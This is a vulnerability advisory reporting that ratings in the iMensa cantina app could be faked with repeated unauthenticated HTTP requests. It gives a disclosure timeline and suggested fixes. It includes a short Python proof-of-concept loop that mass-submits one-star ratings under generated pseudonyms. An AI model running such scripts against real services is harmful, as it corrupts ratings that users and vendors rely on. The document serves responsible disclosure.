iMensa food ratings manipulable

Report ID



  • Vendor: Intelligent Systems GmbH
  • Product: iMensa
  • Affected Version: Any versions
  • Severity: Ratings can be manipulated. Possibly influences how many people visit the cantina.
  • Short summary: Food can be rated many times with a simple http request


All dishes for a cantina can be found here:
example for HDA Schoefferstrasse: dar3

Dishes can be rated with a simple http request containing number of stars, dish id and a user id that can be randomly generated.

An example python script that rates a dish with 1 star many times:

for i in range(3100,9999):
    data = '{"refectory":"dar3","day":"2017-06-02","meal":"1198990","stars":1,"pseudonym":"593087636c'+ str(i) + '.36194932"}'
    print urllib2.urlopen("",data).read()


None available.

Suggested Mitigation

If you don’t wish to receive fake ratings, make use of a proper authentication mechanism. Captchas might also be an option for prohibiting mass-fake ratings.


  • 2017-08-09: found vulnerability
  • 2017-08-09: Contacted Developer
  • 2017-08-10: Sent advisory to developer
  • 2017-08-18: Vulnerability fixed